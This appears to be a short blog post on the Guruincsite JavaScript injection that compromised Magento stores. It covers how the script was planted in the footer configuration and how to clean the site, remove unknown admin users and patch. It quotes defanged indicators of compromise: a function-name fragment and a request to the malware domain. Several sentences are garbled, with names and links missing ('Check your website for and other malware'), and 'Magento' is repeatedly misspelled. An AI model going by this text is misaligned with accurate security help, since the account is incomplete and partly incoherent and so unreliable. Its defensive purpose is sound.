Your Magento Website got Hacked?

Your Magento Website got Hacked? is a new type of malware which is a javascript injection and it has affected thousands of Majento based stores. is used to create iframes and hackers use them to inject malicious scripts to attack Magento sites. Google has already blacklisted seven thousand sites which are attacked by this malware. It was noticed since October 15th, getting redirected to and the attack of any visitor to this infected site, the malicious script will ultimately exploit a flash vulnerability unexpected to the user, silently delivering malware.

How Guruincsite Malware attack sites?

The malware exploits vulnerability in 3rd party extension and it would inject a Javascript malware into Majento database and this would infect visitors to the site. The malware, Guruincsite can take advantage of situations into an administrative account entering through weak password and phishing. The malware allows hackers for administrative access, so it is very important to check fake user account. Google has identified the domains and have categorized these online stores which are affected by hack. The malware is being injected into the design/footer/absolute_footer by entering to the core_config_data table. It is suggested for every website to scan the whole database to find out whether your Majento store is affected or not. It has been reported the infection of both obfuscated and non-obfuscated version of the malware.

Follow these Steps

Every Magento merchants should follow best practices to ensure the security of their website. Even if the website has been deployed by previous patches, they should check for Some best practices to ensure the security of the site involves:

  • Check your website for and other malware and security vulnerabilities on file can lead to future attacks at or
  • Search and remove malicious script which has been infected, onto your site and then submit an unblock request to Google.
  • You must review all admin users in your system, including accounts with username. You must remove the accounts which you are not actively using.
  • It is very important to implement all available patches in order to close any type of exploitable vulnerability.

Removing the Malware

Since the malware is attached to the footer, so go to admin, navigate to system>> configuration>> design>> footer>> Miscellaneous HTML and then remove the malicious code. You can identify the hack by the presence of code function LCWEHH(XHFER1){XHFER1=XHFER1, and another that shows'GET', 'http;//guruincsite,com/1,php'.

  • Delete ASAP unknown admin user, not created by you because it could be a malware.
  • Once you are sure that all malware code is removed, submit the reconsideration request in Google Webmaster Tool to notify them that your site is now clean.
  • Get Magento store patched up with the latest Magento security patches.
  • Change all login credentials and update your website with latest Magento version.


by inerun